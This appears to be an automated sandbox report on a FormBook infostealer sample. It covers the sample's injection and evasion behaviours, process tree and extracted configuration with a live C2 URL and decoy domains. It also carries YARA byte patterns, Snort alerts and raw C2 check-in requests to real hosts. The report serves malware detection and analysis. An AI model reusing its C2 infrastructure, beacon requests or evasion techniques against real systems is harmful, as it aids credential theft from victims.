Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Y4U48592345670954.exe

Overview

General Information

Sample Name:Y4U48592345670954.exe
Analysis ID:383918
MD5:e8e69391d3a931e6638adaebf6a339f6
SHA1:29c02e786c6f8b343bc0f05a1195ff5215d21e63
SHA256:20087dfd9482120735e4e37edc7307b91264632b0c9c7b50a058c100ba186ece
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses netstat to query active network connections and open ports
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Y4U48592345670954.exe (PID: 7016 cmdline: 'C:\Users\user\Desktop\Y4U48592345670954.exe' MD5: E8E69391D3A931E6638ADAEBF6A339F6)
    • Y4U48592345670954.exe (PID: 7080 cmdline: 'C:\Users\user\Desktop\Y4U48592345670954.exe' MD5: E8E69391D3A931E6638ADAEBF6A339F6)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • NETSTAT.EXE (PID: 2628 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
          • cmd.exe (PID: 5052 cmdline: /c del 'C:\Users\user\Desktop\Y4U48592345670954.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.middlehambooks.com/klf/"], "decoy": ["podcastyourvote.com", "northernlsx.com", "guide4idiots.com", "artebythesea.com", "sapanyc.com", "livinoutthedreamsco.com", "thepowersinyou.com", "protocolmodern.com", "holdergear.com", "betteringthehumanexperience.xyz", "agnostec.com", "royermaldonado.com", "wealthtruckingco.com", "artcode-software.com", "microsoftpods.com", "identityofplace.com", "algoritas.com", "grandpaurbanfarm.net", "zahidibr.com", "flawlessdrinking.com", "amymako.com", "tinymodeldiana.com", "restoremyorigin.com", "gyrostoyou.com", "boiler-portal.com", "aprilmarieclaire.com", "midollan.com", "finestfaux.com", "lownak.com", "okque.com", "woodandresin.club", "benficalovers.com", "fangyu5827.com", "tententacleshydro.com", "oouuweee.com", "sgsnit.com", "fairisnotfair.com", "shpwmy.com", "238olive.com", "4515a.com", "frontrangetechnologies.com", "v-travelclub.com", "supportserverhotline23.info", "snowandmotion.com", "colinboycemp.net", "yowoit.com", "neopivot.com", "singlebarrel.net", "esdras-almeida.com", "contecoliving.com", "doctorsdietgulfport.com", "issue72-paypal.com", "pubgfrut.com", "constipationhub.com", "themodernspiritualgoddess.com", "qzhongkong.com", "bizcert360.com", "nashvillegems.com", "barryteeling.com", "wzocflfor.com", "mirrorsmarbella.com", "nyariorganics.com", "packtmall.com", "100973671.review"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b327:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c32a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.1.Y4U48592345670954.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.1.Y4U48592345670954.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.1.Y4U48592345670954.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17609:$sqlite3step: 68 34 1C 7B E1
        • 0x1771c:$sqlite3step: 68 34 1C 7B E1
        • 0x17638:$sqlite3text: 68 38 2A 90 C5
        • 0x1775d:$sqlite3text: 68 38 2A 90 C5
        • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
        2.2.Y4U48592345670954.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.Y4U48592345670954.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1a527:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1b52a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: https://www.contecoliving.com/klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=uZ2wAvira URL Cloud: Label: malware
          Source: http://www.contecoliving.com/klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=uZ2w+Z4jIpZbISXEVO0nnlcpcZqOXsEZ5ezvcOQFXu1NON7E3/DXgqh3GDvoQCt7q85DAvira URL Cloud: Label: malware
          Source: http://www.tententacleshydro.com/klf/?-ZVxY8H=Vu9q6EMrxGDqg7ZmTlOQb6qpgFgK5wW/L8aO6You1Lc6UR7BvVtveZZ7OpvOdghAil0A&KX6xM=0rjPofqhSZfXf0UpAvira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.middlehambooks.com/klf/"], "decoy": ["podcastyourvote.com", "northernlsx.com", "guide4idiots.com", "artebythesea.com", "sapanyc.com", "livinoutthedreamsco.com", "thepowersinyou.com", "protocolmodern.com", "holdergear.com", "betteringthehumanexperience.xyz", "agnostec.com", "royermaldonado.com", "wealthtruckingco.com", "artcode-software.com", "microsoftpods.com", "identityofplace.com", "algoritas.com", "grandpaurbanfarm.net", "zahidibr.com", "flawlessdrinking.com", "amymako.com", "tinymodeldiana.com", "restoremyorigin.com", "gyrostoyou.com", "boiler-portal.com", "aprilmarieclaire.com", "midollan.com", "finestfaux.com", "lownak.com", "okque.com", "woodandresin.club", "benficalovers.com", "fangyu5827.com", "tententacleshydro.com", "oouuweee.com", "sgsnit.com", "fairisnotfair.com", "shpwmy.com", "238olive.com", "4515a.com", "frontrangetechnologies.com", "v-travelclub.com", "supportserverhotline23.info", "snowandmotion.com", "colinboycemp.net", "yowoit.com", "neopivot.com", "singlebarrel.net", "esdras-almeida.com", "contecoliving.com", "doctorsdietgulfport.com", "issue72-paypal.com", "pubgfrut.com", "constipationhub.com", "themodernspiritualgoddess.com", "qzhongkong.com", "bizcert360.com", "nashvillegems.com", "barryteeling.com", "wzocflfor.com", "mirrorsmarbella.com", "nyariorganics.com", "packtmall.com", "100973671.review"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: Y4U48592345670954.exeVirustotal: Detection: 17%Perma Link
          Source: Y4U48592345670954.exeReversingLabs: Detection: 16%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.914660344.0000000003210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.660097535.0000000002850000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.914609737.0000000003110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.689282253.0000000000590000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.1.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Y4U48592345670954.exe.2850000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Y4U48592345670954.exe.2850000.1.unpack, type: UNPACKEDPE
          Source: 2.1.Y4U48592345670954.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.2.NETSTAT.EXE.32fe660.2.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 2.2.Y4U48592345670954.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.2.NETSTAT.EXE.3d6f834.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 0.2.Y4U48592345670954.exe.2850000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: Y4U48592345670954.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: netstat.pdbGCTL source: Y4U48592345670954.exe, 00000002.00000002.689406887.0000000000B10000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.668380838.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: netstat.pdb source: Y4U48592345670954.exe, 00000002.00000002.689406887.0000000000B10000.00000040.00000001.sdmp
          Source: Binary string: C:\xampp\htdocs\Cryptor\def056c534cc4ea39c4345526c5ff6fa\Loader\Loader\Release\p2wf97kzy.pdb source: Y4U48592345670954.exe, 00000000.00000002.659788120.0000000000788000.00000004.00020000.sdmp, yow0w7y8ovyw.dll.0.dr
          Source: Binary string: wntdll.pdbUGP source: Y4U48592345670954.exe, 00000000.00000003.652459500.000000001EF70000.00000004.00000001.sdmp, Y4U48592345670954.exe, 00000002.00000002.689550397.0000000000C6F000.00000040.00000001.sdmp, NETSTAT.EXE, 00000004.00000002.914936849.0000000003840000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Y4U48592345670954.exe, NETSTAT.EXE
          Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.668380838.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 0_2_004026BC FindFirstFileA,
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 4x nop then pop ebx
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop ebx

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 34.102.136.180:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.middlehambooks.com/klf/
          Uses netstat to query active network connections and open portsShow sources
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: global trafficHTTP traffic detected: GET /klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=uZ2w+Z4jIpZbISXEVO0nnlcpcZqOXsEZ5ezvcOQFXu1NON7E3/DXgqh3GDvoQCt7q85D HTTP/1.1Host: www.contecoliving.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /klf/?-ZVxY8H=7bFgTrM7BIAhZVbcluuTkCF4DvVfpU2z3yBqmRvieMtJ1CCKShP62AIfkuNBDgKt+AQL&KX6xM=0rjPofqhSZfXf0Up HTTP/1.1Host: www.identityofplace.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=YaIPTfple60n7g7yPaoibbVQRqDMQPAJpva4MWGp8vGpJzNikHS3aMUGlaJr1Ei+7AZ8 HTTP/1.1Host: www.constipationhub.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /klf/?-ZVxY8H=Vu9q6EMrxGDqg7ZmTlOQb6qpgFgK5wW/L8aO6You1Lc6UR7BvVtveZZ7OpvOdghAil0A&KX6xM=0rjPofqhSZfXf0Up HTTP/1.1Host: www.tententacleshydro.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: DREAMHOST-ASUS DREAMHOST-ASUS
          Source: global trafficHTTP traffic detected: GET /klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=uZ2w+Z4jIpZbISXEVO0nnlcpcZqOXsEZ5ezvcOQFXu1NON7E3/DXgqh3GDvoQCt7q85D HTTP/1.1Host: www.contecoliving.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /klf/?-ZVxY8H=7bFgTrM7BIAhZVbcluuTkCF4DvVfpU2z3yBqmRvieMtJ1CCKShP62AIfkuNBDgKt+AQL&KX6xM=0rjPofqhSZfXf0Up HTTP/1.1Host: www.identityofplace.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=YaIPTfple60n7g7yPaoibbVQRqDMQPAJpva4MWGp8vGpJzNikHS3aMUGlaJr1Ei+7AZ8 HTTP/1.1Host: www.constipationhub.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /klf/?-ZVxY8H=Vu9q6EMrxGDqg7ZmTlOQb6qpgFgK5wW/L8aO6You1Lc6UR7BvVtveZZ7OpvOdghAil0A&KX6xM=0rjPofqhSZfXf0Up HTTP/1.1Host: www.tententacleshydro.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.contecoliving.com
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000003.00000002.915663862.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000000.675423489.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: NETSTAT.EXE, 00000004.00000002.915537693.000000000425F000.00000004.00000001.sdmpString found in binary or memory: https://www.contecoliving.com/klf/?KX6xM=0rjPofqhSZfXf0Up&-ZVxY8H=uZ2w
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 0_2_00404EA0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.914660344.0000000003210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.660097535.0000000002850000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.914609737.0000000003110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.689282253.0000000000590000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.1.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Y4U48592345670954.exe.2850000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.Y4U48592345670954.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Y4U48592345670954.exe.2850000.1.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.689308659.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.914660344.0000000003210000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.914660344.0000000003210000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000001.654536126.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.689148135.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.660097535.0000000002850000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.660097535.0000000002850000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.914609737.0000000003110000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.914609737.0000000003110000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.689282253.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.689282253.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.Y4U48592345670954.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
